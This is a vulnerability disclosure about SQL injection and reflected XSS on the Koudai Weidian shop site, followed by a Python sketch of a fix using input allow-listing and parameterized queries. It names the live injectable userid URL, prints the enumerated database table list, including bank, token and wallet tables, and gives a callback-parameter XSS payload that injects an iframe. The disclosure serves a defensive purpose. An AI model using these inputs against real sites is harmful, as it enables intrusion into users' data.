
Injection in 口袋购物微店 (Koudai Weidian) exposes sensitive data

Published 14-05-30

The 口袋购物微店 site has SQL injection, cross-site scripting and similar issues.

 

Injection point: http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402

The userid parameter is injectable; the tables of the backing database can be enumerated through it:



+-------------------------+
| account_statistics      |
| account_type            |
| active                  |
| address                 |
| address_book            |
| admin_contact           |
| android_info            |
| black_list              |
| bmb_task                |
| buyer_action            |
| buyer_identity          |
| buyer_info              |
| buyer_note              |
| buyer_ua                |
| cate_info               |
| cate_item               |
| complaint               |
| csc_task                |
| csc_task_process        |
| custom                  |
| custom_detail           |
| custom_group            |
| custom_order            |
| express_info            |
| express_note            |
| express_state_info      |
| friend_dynamic          |
| gps                     |
| ios_info                |
| item_bg_category        |
| item_info               |
| item_sku                |
| item_souce              |
| login_info              |
| market_apply            |
| market_record           |
| market_seller_item      |
| market_user             |
| offer_price             |
| order_chargeback        |
| order_desc_info         |
| order_discount          |
| order_fr                |
| order_fr_info           |
| order_info              |
| order_pay               |
| order_refund            |
| order_status_history    |
| order_warrant           |
| pay_batch_no            |
| pay_commission_batch_no |
| pay_commission_note     |
| pay_detail              |
| pay_history             |
| pay_note                |
| pay_seller_id           |
| pay_task                |
| pay_withdrawals_num     |
| phone_valid             |
| role_action             |
| role_info               |
| seal_off                |
| sell_summary            |
| shop_friend             |
| sms_log                 |
| summary_info            |
| tb_move_status          |
| unpay_detail            |
| unpay_list              |
| unpay_order             |
| update_bank_num         |
| user_action             |
| user_bank               |
| user_device             |
| user_discount           |
| user_feedback           |
| user_info               |
| user_key                |
| user_token              |
| user_truename_note      |
| user_union              |
| user_union_msg          |
| user_wallet             |
| user_wallet_workflow    |
| web_feedback            |
| web_notice              |
| white_list              |
| wholesale_info          |
+-------------------------+




In addition, the callback parameter is not properly filtered either, so the JSONP endpoint reflects arbitrary markup:

http://wd.koudai.com/wd/cate/getList?callback=jsonpcallback_1400737646118_061060125241056085%22%27%3E%3C%2Fiframe%3E%3CIFRAME+SRC%3D%22www.baidu.com%22%3E&ver=51402&param=123

Fix:

Filter the userid and callback inputs properly.
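What "filter properly" means for the two parameters above, as an added example (not code from wd.koudai.com, which is PHP; this is a Python sketch of the same endpoint shape). The userid is accepted only as a bounded decimal integer and passed to the database as a bound parameter, so it can never become SQL text; the JSONP callback is accepted only if it is a plain dotted JavaScript identifier, so quotes and angle brackets are rejected instead of being echoed. The table and column names (shop_info, shop_name, owner_phone) and the sample rows are constructed assumptions, not the site's real schema or data.

```python
"""Hardened H5ShopInfo-style JSONP endpoint: allow-listed callback name plus a
parameterized userid lookup.  Added example; schema and rows are constructed."""
import json
import re
import sqlite3
from typing import Dict, Optional, Tuple

# A JSONP callback is only ever a JavaScript identifier, optionally dotted
# (e.g. "jsonpcallback_1400737639575_8703400159720331" or "app.cb").
# Anything else is rejected outright rather than reflected into the response.
_IDENT = r"[A-Za-z_$][A-Za-z0-9_$]*"
CALLBACK_RE = re.compile(r"%s(?:\.%s)*" % (_IDENT, _IDENT))
MAX_CALLBACK_LEN = 64

# userid is a positive decimal integer; ASCII digits only, bounded length.
USERID_RE = re.compile(r"[0-9]{1,10}")


def is_valid_callback(name: str) -> bool:
    """True only for a plain (dotted) JS identifier of bounded length."""
    return len(name) <= MAX_CALLBACK_LEN and CALLBACK_RE.fullmatch(name) is not None


def parse_userid(raw: str) -> Optional[int]:
    """Return the integer user id, or None if the value is not a clean id."""
    if USERID_RE.fullmatch(raw) is None:  # rejects '', spaces, quotes, SQL keywords
        return None
    value = int(raw)
    return value if 0 < value < 2 ** 31 else None


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the shop table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE shop_info (userid INTEGER PRIMARY KEY,"
        " shop_name TEXT, owner_phone TEXT)"
    )
    conn.executemany(
        "INSERT INTO shop_info VALUES (?, ?, ?)",
        [(52, "Sample shop 52", "13800000000"), (53, "Sample shop 53", "13900000000")],
    )
    conn.commit()
    return conn


def shop_info(conn: sqlite3.Connection, raw_userid: str,
              raw_callback: str) -> Tuple[int, Dict[str, str], str]:
    """Handle one request; returns (status, headers, body)."""
    plain = {"Content-Type": "text/plain; charset=utf-8"}
    if not is_valid_callback(raw_callback):
        return 400, plain, "bad callback"
    userid = parse_userid(raw_userid)
    if userid is None:
        return 400, plain, "bad userid"
    # Parameterized query: userid travels as bound data, never as SQL text,
    # so "52 OR 1=1" or a UNION SELECT cannot change the statement.
    row = conn.execute(
        "SELECT userid, shop_name FROM shop_info WHERE userid = ?", (userid,)
    ).fetchone()
    if row is None:
        return 404, plain, "no such shop"
    # Expose only what a public shop page needs; owner_phone stays server-side.
    payload = {"userid": row[0], "shop_name": row[1]}
    headers = {
        # Script content type plus nosniff: browsers will not render this as HTML.
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    # Leading comment keeps the response from starting with attacker-chosen
    # bytes; json.dumps escapes non-ASCII, including U+2028/U+2029.
    body = "/**/%s(%s);" % (raw_callback, json.dumps(payload))
    return 200, headers, body


if __name__ == "__main__":
    db = build_sample_db()
    for uid, cb in [("52", "jsonpcallback_1400737639575_8703400159720331"),
                    ("52 OR 1=1", "cb"),
                    ("52", 'cb"\'></iframe><IFRAME SRC="www.baidu.com">')]:
        status, _, body = shop_info(db, uid, cb)
        print(status, repr(uid), repr(cb[:20]), body[:60])
```

The two checks are independent on purpose: a request with a valid callback but a tampered userid fails before any SQL runs, and a request with a valid userid but a hostile callback never reaches the response builder. Restricting the returned columns is the other half of the fix, since the injection above exposed tables such as user_bank and user_token that a shop-info page has no reason to touch.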


Copyright 红黑联盟, a site dedicated to practical IT technology learning.